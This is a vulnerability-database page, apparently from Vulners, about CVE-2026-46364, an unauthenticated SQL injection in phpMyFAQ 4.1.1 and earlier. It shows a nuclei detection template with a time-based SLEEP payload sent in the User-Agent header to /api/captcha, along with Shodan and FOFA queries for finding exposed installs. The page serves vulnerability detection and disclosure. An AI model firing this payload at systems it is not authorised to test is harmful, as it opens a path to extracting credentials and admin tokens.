Lucene search
K

phpMyFAQ <= 4.1.1 - SQL Injection

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Unauthenticated SQL injection in phpMyFAQ <=4.1.1 via BuiltinCaptcha, exploitable at the captcha endpoint.

Related
Refs
Code
id: CVE-2026-46364

info:
  name: phpMyFAQ <= 4.1.1 - SQL Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    phpMyFAQ before 4.1.2 contains an unauthenticated SQL injection vulnerability in BuiltinCaptcha::garbageCollector() and BuiltinCaptcha::saveCaptcha() methods that interpolate unsanitized User-Agent headers into DELETE and INSERT queries. Unauthenticated attackers can exploit the public GET /api/captcha endpoint by crafting malicious User-Agent headers to perform time-based blind SQL injection, extracting sensitive data including user credentials, admin tokens, and SMTP credentials from the database.
  impact: |
    Unauthenticated attackers can extract sensitive data including user credentials, admin tokens, and SMTP credentials from the database.
  remediation: |
    Upgrade phpMyFAQ to version 4.1.2 or later.
  reference:
    - https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-289f-fq7w-6q2w
    - https://www.phpmyfaq.de
    - http://nvd.nist.gov/vuln/detail/CVE-2026-46364
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
    epss-score: 0.01709
    epss-percentile: 0.74567
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1194891278
    fofa-query: app="phpMyFAQ"
  tags: cve,cve2026,sqli,phpmyfaq

http:
  - raw:
      - |
        @timeout: 20s
        GET /api/captcha HTTP/1.1
        Host: {{Hostname}}
        User-Agent: x' OR SLEEP(8) OR 'x

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains(body, "Truncated incorrect DOUBLE")'
        condition: and
# digest: 4a0a0047304502205efa40e66623ad1c6b9564db319a2386c449aacd226d7ae1ea6971fae96d3fdb022100b8f0b721b3e3bfb9efc0f8fc828f3ee5397ae1cad93905d68c718aa7565f738f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jun 2026 12:16Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
CVSS 3.19.8
EPSS0.01709
SSVC
12